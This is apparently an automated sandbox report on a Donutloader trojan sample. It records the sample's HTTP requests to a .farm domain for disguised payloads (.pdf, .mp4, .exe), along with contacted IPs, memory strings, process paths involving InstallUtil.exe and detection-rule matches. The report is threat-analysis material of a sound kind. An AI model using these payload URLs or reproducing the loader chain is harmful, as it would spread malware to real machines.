                    Source: global trafficHTTP traffic detected: GET /don2-m/Dllzeadr.pdf HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewIP Address: 77.221.140.76 77.221.140.76
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1 Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /don2-m/kr/Wudbiu.exe HTTP/1.1 Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /don2-m/Dllzeadr.pdf HTTP/1.1 Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
Source: global traffic | DNS traffic detected: DNS query: 1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
Source: powershell.exe, 00000001.00000002.2345847023.00000182CF8C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: InstallUtil.exe, 00000004.00000002.2976520133.00000000033C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
Source: InstallUtil.exe, 00000004.00000002.2976520133.00000000033C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm8
Source: powershell.exe, 00000001.00000002.2289203789.00000182C7537000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: file.exe, 00000000.00000002.1789639440.0000000007729000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.microso
Source: file.exe, 00000000.00000002.1788650172.0000000007287000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.microsoft
Source: powershell.exe, 00000001.00000002.1923913361.00000182B76E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: file.exe, 00000000.00000002.1763526633.0000000003371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B74C1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003121000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2976520133.0000000003051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116C31000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002851000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1923913361.00000182B76E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.2347588371.000002112F32A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000001.00000002.1923913361.00000182B74C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116C31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: InstallUtil.exe, 00000004.00000002.2976520133.00000000033B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.
Source: file.exe, 00000000.00000002.1763526633.0000000003371000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003121000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2976520133.00000000033B4000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002851000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
Source: InstallUtil.exe, 00000004.00000002.2976520133.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000000.1930459181.0000000000512000.00000002.00000001.01000000.0000000B.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002851000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe.4.dr | String found in binary or memory: https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/Dllzeadr.pdf
Source: InstallUtil.exe, 00000004.00000002.2976520133.00000000033B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/kr/Wudbi
Source: file.exe, TypeId.exe.0.dr | String found in binary or memory: https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2/Qlxywcbxa.mp4
Source: powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000001.00000002.2345847023.00000182CF8C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ion=v4.5T
Source: powershell.exe, 00000001.00000002.2289203789.00000182C7537000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003526000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003170000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2976520133.0000000003200000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65277
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 65277 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:65277 version: TLS 1.2

                    System Summary

Source: 11.2.txxbiwtbs.exe.4074c50.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 11.2.txxbiwtbs.exe.4024c30.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000B.00000002.2160867351.0000000006470000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1821399208.0000000009650000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000B.00000002.1995844689.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000003.00000002.1869188121.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1824447213.000000000A088000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0610D708
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0610FDA8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06E0D280
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06E0A590
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0711CD28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0711B368
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07B889D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07B94288
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07B94278
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_09E6D8A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_09E50040
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_09E50039
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9BB830E9
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_06D58948
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_06D64288
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_06D64278
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_06D62B4F
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_07125618
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_0712DEAF
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_071215B0
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_0712CAE8
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_07125617
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_0712CAD9
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_07122918
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_07122908
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_075FC628
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_075FA458
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_075FC619
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_07A7A590
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_07A7D280
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_07BE9F10
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_07BE4760
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_07BED337
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_07BE5378
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_07BEB6A0
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_07BE4AA8
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_08DDD8A0
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_08DC0040
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_08DC000A
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_07BE0006
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Code function: 3_2_07BE0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_07BCD708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08ADCAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08AD15B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08ADDEAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08AD2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08AD5059
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08AD2908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08AD390B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08AD2918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08ADCAD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08AD5618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08AD2FA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08AD2FE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08AD2F2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08AD2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08AD2F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08B0D8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08AF0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_08AF0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_0A3BCB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_0A3BA538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_0A3BCAF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_0A819F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_0A81D337
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_0A815378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_0A810040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_0A814760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_0A814AA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_0A810007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_0A81B6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_0A9BCD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4_2_0A9BB368
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_056BD508
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_056BCC2E
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_056BD4F9
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_056BD698
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_056F4C37
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_056F4418
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_056F451D
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_056F4408
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_06525254
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_06522A5C
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_065208C0
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_06521B78
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_0652179C
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_06521FA8
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_083CDDE0
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_083B0037
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_083B0040
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Code function: 11_2_083CD240
Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
Source: file.exe, 00000000.00000000.1709874025.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameFbaprhuy.exe2 vs file.exe
Source: file.exe, 00000000.00000002.1763526633.00000000033C0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.1808267831.0000000008F40000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameAblswvgh.dll" vs file.exe
Source: file.exe, 00000000.00000002.1786708622.0000000006F80000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
Source: file.exe, 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
Source: file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFbedztzxbbe.dll" vs file.exe
Source: file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
Source: file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
Source: file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
Source: file.exe, 00000000.00000002.1761959990.000000000123E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
Source: file.exe, 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFbedztzxbbe.dll" vs file.exe
Source: file.exe, 00000000.00000002.1763526633.000000000368B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenametaskschd.dll.muij% vs file.exe
Source: file.exe, 00000000.00000002.1763526633.000000000368B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $fq,\\StringFileInfo\\040904B0\\OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.1763526633.0000000003646000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
Source: file.exe | Binary or memory string: OriginalFilenameFbaprhuy.exe2 vs file.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 11.2.txxbiwtbs.exe.4074c50.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 11.2.txxbiwtbs.exe.4024c30.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
